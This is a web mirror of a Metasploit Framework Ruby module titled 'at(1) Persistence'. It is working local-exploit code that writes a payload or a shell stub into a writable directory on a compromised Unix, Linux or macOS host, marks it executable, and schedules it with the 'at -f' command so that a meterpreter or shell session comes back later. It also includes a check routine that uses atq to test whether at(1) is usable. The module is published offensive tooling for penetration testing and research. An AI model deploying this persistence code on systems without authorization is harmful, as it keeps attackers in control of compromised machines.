Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/multi/persistence/at.rb
21839 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Local

7
  Rank = ExcellentRanking

8


9
  include Msf::Post::File

10
  include Msf::Exploit::FileDropper

11
  include Msf::Exploit::EXE # for generate_payload_exe

12
  include Msf::Exploit::Local::Persistence

13
  include Msf::Exploit::Local::Timespec

14
  prepend Msf::Exploit::Remote::AutoCheck

15
  include Msf::Exploit::Deprecated

16
  moved_from 'exploits/unix/local/at_persistence'

17


18
  def initialize(info = {})

19
    super(

20
      update_info(

21
        info,

22
        'Name' => 'at(1) Persistence',

23
        'Description' => %q{

24
          This module executes a metasploit payload utilizing at(1) to execute jobs at a specific time.  It should work out of the box

25
          with any UNIX-like operating system with atd running.

26
          Verified on Kali linux and OSX 13.7.4

27
        },

28
        'License' => MSF_LICENSE,

29
        'Author' => [

30
          'Jon Hart <[email protected]>'

31
        ],

32
        'Targets' => [['Automatic', {} ]],

33
        'DefaultTarget' => 0,

34
        'Platform' => %w[unix linux osx],

35
        'Arch' => [

36
          ARCH_CMD,

37
          ARCH_X86,

38
          ARCH_X64,

39
          ARCH_ARMLE,

40
          ARCH_AARCH64,

41
          ARCH_PPC,

42
          ARCH_MIPSLE,

43
          ARCH_MIPSBE

44
        ],

45
        'SessionTypes' => ['meterpreter', 'shell'],

46
        'DisclosureDate' => '1997-01-01', # http://pubs.opengroup.org/onlinepubs/007908799/xcu/at.html

47
        'References' => [

48
          ['URL', 'https://linux.die.net/man/1/at'],

49
          ['URL', 'https://www.geeksforgeeks.org/at-command-in-linux-with-examples/'],

50
          ['ATT&CK', Mitre::Attack::Technique::T1053_002_AT],

51
          ['ATT&CK', Mitre::Attack::Technique::T1053_001_AT_LINUX],

52
        ],

53
        'Notes' => {

54
          'Reliability' => [REPEATABLE_SESSION, EVENT_DEPENDENT],

55
          'Stability' => [CRASH_SAFE],

56
          'SideEffects' => [ARTIFACTS_ON_DISK, CONFIG_CHANGES]

57
        }

58
      )

59
    )

60


61
    register_options([

62
      OptString.new('TIME', [false, 'When to run job via at(1). See timespec', 'now']),

63
      OptString.new('PAYLOAD_NAME', [false, 'Name of the payload file to write']),

64
    ])

65
  end

66


67
  def check

68
    return CheckCode::Safe("#{datastore['WritableDir']} does not exist") unless exists? datastore['WritableDir']

69
    return CheckCode::Safe("#{datastore['WritableDir']} not writable") unless writable? datastore['WritableDir']

70


71
    return CheckCode::Safe('at(1) not found on system') unless command_exists? 'at'

72


73
    # we do a direct test with atq instead of reading at.allow and at.deny

74
    token = Rex::Text.rand_text_alphanumeric(8)

75
    if cmd_exec("atq && echo #{token}").include?(token)

76
      return CheckCode::Vulnerable('at(1) confirmed to be usable as a persistence mechanism')

77
    end

78


79
    CheckCode::Safe('at(1) not usable as a persistence mechanism likely due to explicit permissions in at.allow or at.deny')

80
  end

81


82
  def install_persistence

83
    fail_with(Failure::BadConfig, "TIME option isn't valid timespec") unless Msf::Exploit::Local::Timespec.valid_timespec?(datastore['TIME'])

84
    payload_path = datastore['WritableDir']

85
    payload_path = payload_path.end_with?('/') ? payload_path : "#{payload_path}/"

86
    payload_name = datastore['PAYLOAD_NAME'] || rand_text_alphanumeric(5..10)

87
    payload_path << payload_name

88
    vprint_status("Writing payload to #{payload_path}")

89


90
    if payload.arch.first == 'cmd'

91
      upload_and_chmodx(payload_path, payload.encoded)

92
    else

93
      # because the payloads contents is imported into the at job, we use a stub to call our payload

94
      # as it doesn't like binary payloads directly

95
      payload_path_exe = "#{payload_path}#{rand_text_alphanumeric(1..2)}"

96
      # stub, but keep payload_path name for consistency

97
      upload_and_chmodx(payload_path, "#!/bin/sh\n#{payload_path_exe} &\n")

98
      upload_and_chmodx(payload_path_exe, generate_payload_exe)

99
      @clean_up_rc << "rm #{payload_path_exe}\n"

100
    end

101


102
    @clean_up_rc << "rm #{payload_path}\n"

103


104
    job = cmd_exec("at -f #{payload_path} #{datastore['TIME']}")

105
    job_id = job.split(' ')[1]

106
    print_good("at job created with id: #{job_id}")

107
    # this won't actually do anything since its not in a shell

108
    @clean_up_rc << "atrm #{job_id}\n"

109


110
    print_status("Waiting up to #{datastore['WfsDelay']}sec for execution")

111
  end

112
end

113


114